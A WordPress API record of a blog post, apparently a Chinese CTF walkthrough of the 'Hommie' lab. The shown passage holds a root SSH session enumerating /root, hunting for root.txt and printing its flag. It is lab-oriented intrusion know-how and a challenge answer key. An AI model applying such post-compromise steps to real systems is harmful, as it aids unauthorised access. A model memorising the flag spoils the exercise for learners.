Permanently added &#039;172.20.10.5&#039; (ECDSA) to the list of known hosts.\nLinux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Wed Sep 30 11:03:23 2020\nroot@hommie:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@hommie:~# cd \/root\nroot@hommie:~# ls -la\ntotal 32\ndrwx------  4 root root 4096 Sep 30  2020 .\ndrwxr-xr-x 18 root root 4096 Sep 30  2020 ..\n-rw-------  1 root root   52 Sep 30  2020 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  3 root root 4096 Sep 30  2020 .local\n-rw-------  1 root root   44 Sep 30  2020 note.txt\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\ndrwx------  2 root root 4096 Sep 30  2020 .ssh\nroot@hommie:~# cat note.txt \nI dont remember where I stored root.txt !!!\nroot@hommie:~# cat .bash_history \ncd \/root\nls -la\nrm .bash_history\n\/usr\/sbin\/poweroff\nroot@hommie:~# find \/ -name root.txt -type f 2&gt;\/dev\/null\n\/usr\/include\/root.txt\nroot@hommie:~# cat \/usr\/include\/root.txt\nImnotbatman<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Hommie \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.5 &#8212; -A PORT STA [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-542","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/542","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=542"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/542\/revisions"}],"predecessor-version":[{"id":543,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/542\/revisions\/543"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=542"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=542"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}